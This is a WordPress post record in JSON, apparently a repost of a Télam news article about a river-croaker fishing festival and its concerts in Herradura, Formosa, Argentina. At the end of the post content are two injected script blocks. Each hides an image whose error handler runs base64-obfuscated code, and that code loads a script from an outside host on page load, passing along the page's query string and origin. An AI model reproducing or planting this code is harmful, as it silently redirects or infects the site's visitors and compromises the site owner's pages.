{"id":3744,"date":"2024-02-22T10:02:48","date_gmt":"2024-02-22T13:02:48","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3744"},"modified":"2025-08-14T00:00:05","modified_gmt":"2025-08-14T03:00:05","slug":"nuevos-atractivos-para-pescadores-y-turistas-en-el-festival-de-la-corvina-de-rio","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3744","title":{"rendered":"Nuevos atractivos para pescadores y turistas, en el Festival de la Corvina de R\u00edo"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-c4a0d811416a1a168314695dc9c7e69c\" style=\"background-color:#746153\"><em>En la localidad formose\u00f1a de Herradura, este s\u00e1bado habr\u00e1 actividades culturales, espect\u00e1culos musicales y danzas en el predio de playa, y el domingo ser\u00e1 el turno de la pesca a remo, dado que por la bajante del r\u00edo en esta ocasi\u00f3n no habr\u00e1 competenecia con embarcaciones a motor.<\/em><\/h4>\n\n\n\n<p class=\"has-text-align-right\"><em><sup>POR ELIO ALBARENGA<\/sup><\/em><\/p>\n\n\n\n<p>La villa tur\u00edstica de Herradura albergar\u00e1 este fin de semana a cientos de visitantes de provincias del norte y de pa\u00edses vecinos para sumarse al<strong>&nbsp;XXI Festival de la Corvina de R\u00edo, que se realizar\u00e1 en la playa de la laguna hom\u00f3nima, ubicada a unos 44 kil\u00f3metros al sureste de la ciudad de Formosa.<\/strong><\/p>\n\n\n\n<p>En ese marco, este s\u00e1bado habr\u00e1 actividades culturales, espect\u00e1culos musicales y danzas en el predio de playa y el domingo ser\u00e1 el turno de la pesca a remo, dado que por la bajante del r\u00edo en esta ocasi\u00f3n no habr\u00e1 competenecia con embarcaciones a motor.<\/p>\n\n\n\n<p>Herradura, el escenario donde los participantes buscar\u00e1n a la pieza de corvina de r\u00edo m\u00e1s grande, es una laguna originada por un meandro abandonado del r\u00edo Paraguay, que est\u00e1 ubicada a 4 kil\u00f3metros de la localidad hom\u00f3nima y 44 kil\u00f3metros de Formosa, ciudad desde que se llega despu\u00e9s de transitar la ruta nacional 11 y la provincial 1.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65d6424bb4691_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">El escenario donde los participantes buscar\u00e1n a la pieza de corvina de r\u00edo m\u00e1s grande es una laguna originada por un meandro abandonado del r\u00edo Paraguay \/ Foto Prensa.<\/figcaption><\/figure>\n\n\n\n<p>Su nombre originario fue \u00abErradura\u00bb porque los conquistadores espa\u00f1oles la confundieron como un tramo del r\u00edo Paraguay, aunque, en rigor, es una laguna, que adem\u00e1s posee una curiosa forma de \u00abherradura\u00bb. Los jesuitas fundaron all\u00ed en el siglo XVIII una misi\u00f3n que aglutin\u00f3 a los abipones, pueblo originario que habitaba el Gran Chaco, eximios guerreros y que viv\u00edan de la caza, la pesca y la recolecci\u00f3n de frutos.<\/p>\n\n\n\n<p>Desde hace d\u00e9cadas, la pesca deportiva es el principal atractivo tur\u00edstico de la zona, raz\u00f3n por la cual, desde 2002, se realiza en la laguna el festival, que congrega a pescadores y dem\u00e1s visitantes provenientes de todas las localidades formose\u00f1as; de las provincias de Santa Fe, Corrientes y Chaco; y de Brasil, Uruguay y Paraguay.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65d6424bcac12_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Una parte de la celebraci\u00f3n transcurre en la laguna y otra en un predio preparado para presentaciones y espect\u00e1culos art\u00edsticos \/ Foto Prensa.<\/figcaption><\/figure>\n\n\n\n<p>Tambi\u00e9n se realizan en la laguna diversas actividades n\u00e1uticas y en su margen derecho se ubican varios campings y guarder\u00edas de lanchas.<\/p>\n\n\n\n<p>Una parte de la celebraci\u00f3n transcurre en la laguna y otra en un predio preparado para presentaciones y espect\u00e1culos art\u00edsticos, donde este fin de semana brindar\u00e1n conciertos grupos de m\u00fasica folkl\u00f3rica de la zona, en particular chamam\u00e9, aunque no faltar\u00e1n otros g\u00e9neros populares.<\/p>\n\n\n\n<p><strong>\u00abSi bien no tendr\u00e1 la dimensi\u00f3n de ediciones anteriores, tendremos un lindo festival, en el cual van a prevalecer la actuaci\u00f3n de artistas de la provincia\u00bb<\/strong>, dijo el intendente de Herradura, Ernesto Heizenreder.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65d6424be20b3_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Destacaron \u00abel gran tama\u00f1o\u00bb que tienen las corvinas que se pescan en la zona \/ Foto Prensa.<\/figcaption><\/figure>\n\n\n\n<p>La programaci\u00f3n musical incluye, entre otros artistas,<strong>&nbsp;a Ivan Ruiz, \u00c1ngelo Aranda y Los Changos de Lavalle, mientras que Angela Garay y Mariel Olmedo animar\u00e1n la fiesta con m\u00fasicas tropicales.<\/strong><\/p>\n\n\n\n<p>Desde esa cartera destacaron \u00abel gran tama\u00f1o\u00bb que tienen las corvinas, al tiempo que se\u00f1alaron que, en la actual temporada estival, Herradura se consolid\u00f3 como destino de fin de semana, al que concurren turistas de diversos puntos de Formosa y de provincias aleda\u00f1as.<\/p>\n\n\n\n<p>Por otra parte, la ministra de Turismo de Formosa, Silvia Segovia, subray\u00f3 d\u00edas pasados que las fiestas populares como la de la Corvina de R\u00edo \u00ab<strong>son un eje importante del turismo como una actividad de gran relevancia econ\u00f3mica\u00bb debido a su \u00abefecto dinamizador\u00bb<\/strong>&nbsp;en diversos sectores productivos y de servicios.<\/p>\n\n\n\n<p>Y record\u00f3 que&nbsp;<strong>\u00abgeneran un fuerte movimiento comercial, de servicios tur\u00edsticos en las localidades donde se centran, siendo en este caso Herradura y toda su regi\u00f3n de influencia\u00bb,<\/strong>&nbsp;en el sureste provincial.<\/p>\n\n\n\n<p>M\u00e1s all\u00e1 del festival, en la laguna y sus alrededores hay una nutrida oferta de servicios, que incluyen paseos en lancha, motos de aguas, banana acu\u00e1tica y canoas, actividades deportivas y caminatas y recorridos por la costa.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65d6424c1c962_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">Desde hace d\u00e9cadas, la pesca deportiva es el principal atractivo tur\u00edstico de la zona \/ Foto Prensa.<\/figcaption><\/figure>\n\n\n\n<p>El predio, por su parte,&nbsp;<strong>se repleta de puestos de comida y de artesan\u00edas<\/strong>. De hecho, el XXI Festival de la Corvina de R\u00edo incluir\u00e1 la degustaci\u00f3n de delicias gastron\u00f3micas locales, al tiempo que prev\u00e9 en su programaci\u00f3n actividades culturales como pintura, lectura, canto y proyecciones cinematogr\u00e1ficas al aire libre.<\/p>\n\n\n\n<p>Para los pescadores en la modalidad embarcada a remo, el primer premio ser\u00e1 un motor Yamaha 3 hp; el segundo, un Yamaha 2 hp; el tercero, chalecos salvavidas adem\u00e1s de reels de pescas, trofeos y medallas.<\/p>\n\n\n\n<p>Para llegar a la fiesta de este fin de semana, el visitante contar\u00e1 con un servicio de transporte interurbano que saldr\u00e1 el s\u00e1bado desde la Plaza San Mart\u00edn, en la intersecci\u00f3n de la avenida 25 de mayo y Fontana, de la ciudad de Formosa, a partir de las 10. En tanto, durante el domingo las salidas del transporte ser\u00e1n a partir de las 9 hasta las 20, desde el mismo sitio que la jornada anterior.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/www.telam.com.ar\/thumbs\/bluesteel\/advf\/imagenes\/2024\/02\/65d6424b88d12_1200.jpg\" alt=\"\"\/><figcaption class=\"wp-element-caption\">La programaci\u00f3n musical incluye, entre otros artistas, a Ivan Ruiz, \u00c1ngelo Aranda y Los Changos de Lavalle, mientras que Angela Garay y Mariel Olmedo animar\u00e1n la fiesta con m\u00fasicas tropicales \/ Foto Prensa.<\/figcaption><\/figure>\n\n\n\n<p>Respecto a los viajes desde Herradura hasta Formosa capital, ser\u00e1n con intervalos de una hora y hasta las 23, desde la curva cerca de la playa.<\/p>\n\n\n\n<p>En Herradura, sobre la ruta provincial 1, funciona adem\u00e1s el Complejo Provincial \u00abDel Timb\u00f3\u00bb, que ofrece instalaciones y servicios de entrada libre y gratuita con pileta para ni\u00f1os, pileta semiol\u00edmpica, canchas de f\u00fatbol y voley, juegos infantiles, quincho, cocina y parrillas.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><a href=\"https:\/\/www.telam.com.ar\/notas\/202402\/655868-festival-corvna-de-rio-formosa-pesca-turismo.html\" target=\"_blank\" rel=\"noreferrer noopener\"><img fetchpriority=\"high\" decoding=\"async\" width=\"964\" height=\"96\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg\" alt=\"\" class=\"wp-image-664\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_.jpeg 964w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-300x30.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-768x76.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2022\/05\/Captura-web_6-4-2022_125922_www.telam_.com_.ar_-696x69.jpeg 696w\" sizes=\"(max-width: 964px) 100vw, 964px\" \/><\/a><figcaption class=\"wp-element-caption\">Fuente<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>En la localidad formose\u00f1a de Herradura, este s\u00e1bado habr\u00e1 actividades culturales, espect\u00e1culos musicales y danzas en el predio de playa, y el domingo ser\u00e1 el turno de la pesca a remo, dado que por la bajante del r\u00edo en esta ocasi\u00f3n no habr\u00e1 competenecia con embarcaciones a motor. POR ELIO ALBARENGA La villa tur\u00edstica de [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3745,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[13],"tags":[],"class_list":{"0":"post-3744","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3744"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3744"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3744\/revisions"}],"predecessor-version":[{"id":6845,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3744\/revisions\/6845"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3745"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3744"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3744"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3744"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}